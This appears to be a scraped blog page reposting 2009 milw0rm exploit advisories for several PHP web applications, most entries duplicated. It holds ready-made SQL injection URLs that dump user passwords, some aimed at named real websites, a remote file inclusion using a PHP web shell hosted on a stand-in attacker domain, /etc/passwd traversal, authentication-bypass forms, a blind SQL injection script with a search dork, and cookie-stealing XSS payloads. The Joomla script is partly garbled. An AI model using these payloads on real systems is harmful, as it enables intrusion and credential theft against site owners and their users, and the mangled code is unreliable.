http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)
$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Wili-CMS 0.4.0 (RFI/LFI/AB) Multiple Remote Vulnerabilities
Application: Wili-CMS
Version: 0.4.0
Website: http://wili-cms.sourceforge.net/
Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple Remote/Local File Inclusion
Requisites: none
File affected: index.php
This bug allows a guest to include remote and
local files and however to exec remote commands.
...
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: lib/admin/init_session.php
This bug allows a guest to login as admin.
...
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];
...
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
Code
- [A] Multiple Remote/Local File Inclusion
shell.txt: ?php system($_GET['cmd']); ?
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd
- [B] Authentication Bypass
html
head
title Wili-CMS 0.4.0 Authentication Bypass Exploit /title
/head
body
form action="http://www.site.com/path/admin.php" method="POST"
input type="text" name="uname" value="admin"
input type="hidden" name="password" value="1') UNION ALL SELECT 1#"
input type="hidden" name="mode" value="loggedin"
input type="hidden" name="npage" value="1"
input type="submit" value="Exploit"
/form
/body
/html
Fix
No fix.
# milw0rm
Version: 0.4.0
Website: http://wili-cms.sourceforge.net/
Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple Remote/Local File Inclusion
Requisites: none
File affected: index.php
This bug allows a guest to include remote and
local files and however to exec remote commands.
...
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: lib/admin/init_session.php
This bug allows a guest to login as admin.
...
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];
...
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
Code
- [A] Multiple Remote/Local File Inclusion
shell.txt: ?php system($_GET['cmd']); ?
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd
- [B] Authentication Bypass
html
head
title Wili-CMS 0.4.0 Authentication Bypass Exploit /title
/head
body
form action="http://www.site.com/path/admin.php" method="POST"
input type="text" name="uname" value="admin"
input type="hidden" name="password" value="1') UNION ALL SELECT 1#"
input type="hidden" name="mode" value="loggedin"
input type="hidden" name="npage" value="1"
input type="submit" value="Exploit"
/form
/body
/html
Fix
No fix.
# milw0rm
Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
BlueEye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
found by ka0x
Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off
- Vuln code:
10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: img src="http://www.blogger.com/%5C" / Logged as: ".$logged." (ID: ".$logged_id.")
Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
# milw0rm
found by ka0x
Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off
- Vuln code:
10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: img src="http://www.blogger.com/%5C" / Logged as: ".$logged." (ID: ".$logged_id.")
Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
# milw0rm
Joomla com_ijoomla_archive Blind SQL Injection Exploit
?php
Joomla com_ijoomla_archive Blind SQL Injection Exploit
AUTHOR : Mountassif Moad
DATE : 5 mars 2009
APPLICATION : Joomla com_ijoomla_archive
DORK : inurl:"com_ijoomla_archive"
*/
ini_set("max_execution_time",0);
print_r('
com_ijoomla_archiv Blind SQL Injection Exploit
php '.$argv[0].' http://www.site.com/ real id
Demo :
php '.$argv[0].' http://thecatholicspirit.com/ 17
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < userid =" 1;" userid =" $argv[2];" r =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="1" w =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="0" t =" abs((100-($w/$r*100)));" j =" 1;" i =" 46;" i="$i+2)" i ="="" i =" 98;" laenge =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid=""> $t-1) {
$laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: find another site\n";
}
?>
# milw0rm
Joomla com_ijoomla_archive Blind SQL Injection Exploit
AUTHOR : Mountassif Moad
DATE : 5 mars 2009
APPLICATION : Joomla com_ijoomla_archive
DORK : inurl:"com_ijoomla_archive"
*/
ini_set("max_execution_time",0);
print_r('
com_ijoomla_archiv Blind SQL Injection Exploit
php '.$argv[0].' http://www.site.com/ real id
Demo :
php '.$argv[0].' http://thecatholicspirit.com/ 17
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < userid =" 1;" userid =" $argv[2];" r =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="1" w =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="0" t =" abs((100-($w/$r*100)));" j =" 1;" i =" 46;" i="$i+2)" i ="="" i =" 98;" laenge =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid=""> $t-1) {
$laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: find another site\n";
}
?>
# milw0rm
CelerBB 0.0.2 Multiple Remote Vulnerabilities
Application: CelerBB
Version: 0.0.2
Website: http://celerbb.sourceforge.net/
Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authenticaion Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
Requisites: none
File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: login.php
This bug allows a guest to bypass authentication.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
html
head
title CelerBB 0.0.2 Authentication Bypass Exploit /title
/head
body
form action="login.php" method="POST"
input type="hidden" name="Username" value="admin'#"
input type="submit" value="Exploit"
/form
/body
/html
Fix
No fix.
# milw0rm
Version: 0.0.2
Website: http://celerbb.sourceforge.net/
Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authenticaion Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
Requisites: none
File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: login.php
This bug allows a guest to bypass authentication.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
html
head
title CelerBB 0.0.2 Authentication Bypass Exploit /title
/head
body
form action="login.php" method="POST"
input type="hidden" name="Username" value="admin'#"
input type="submit" value="Exploit"
/form
/body
/html
Fix
No fix.
# milw0rm
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
Program: NovaBoard
Version: <= 1.0.1 File affected: index.php Download: http://www.novaboard.net/ Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
script alert(document.cookie) /script
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
Version: <= 1.0.1 File affected: index.php Download: http://www.novaboard.net/ Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
script alert(document.cookie) /script
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
Subscribe to:
Posts (Atom)
Posts
